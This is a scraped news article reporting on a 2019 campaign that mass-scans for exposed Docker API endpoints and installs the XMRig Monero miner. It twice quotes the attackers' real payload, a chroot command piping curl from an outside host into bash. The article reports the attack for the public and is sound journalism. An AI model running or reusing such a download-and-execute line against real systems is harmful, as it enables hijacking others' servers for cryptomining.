Monday , September 21 2020
Home / AI / Robots / Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency

Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency

TNW uses cookies to personalize content and ads to
make our site easier for you to use.
We do also share that information with third parties for
advertising & analytics.

Powered by

Blockchain, cryptocurrencies, and insider stories by TNW.

Its size is what caught the attention of researchers

A hacking group is reportedly performing a mass-scan of the internet in search of vulnerable ports on systems using enterprise sandbox software Docker to mine cryptocurrency.

According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a cryptocurrency miner on a company’s Docker instances, ZDNet reports.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
“Command”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;'”,#threatintel pic.twitter.com/vxszV5SF1o

— Bad Packets Report (@bad_packets) November 25, 2019

Troy Mursch, chief researcher and co-founder of Bad Packets, told ZDNet this type of activity is quite common. However, this campaign was unique because of its size.

Researchers are yet to get to grips with the entire scope of the campaign. However, as it stands, the attack is scanning over 59,000 IP networks looking for vulnerable Docker instances.

When an exposed instance is found, the below line of code is run.

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

This downloads a further script from the attacker’s server which then installs a cryptocurrency mining bot, Monero miner XMRig.

In the few days since hackers started scanning for exposed Docker instances, more than 14.8 Monero has been mined, about $740 worth, Mursch added.

If you’re not into enterprise software you might not know what Docker is, but one of TNW’s devs explained it to me as a “virtual container” in which you can run other virtual machines.

Docker itself isn’t a virtual machine though, it’s sandbox environment and does need some resources from the host machine to run properly.

It lets devs package applications and run them in virtual environments.

You can read this explainer for more information.

Published November 27, 2019 — 13:47 UTC

Thank you!

Copyright © 2006—2019.
All rights reserved.
Made with in Amsterdam.

Source

About IT News Ug

Check Also

Satoshi Nakaboto: ‘Kraken just got a US banking license’

TNW uses cookies to personalize content and ads to make our site easier for you …

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

//graizoah.com/afu.php?zoneid=2572107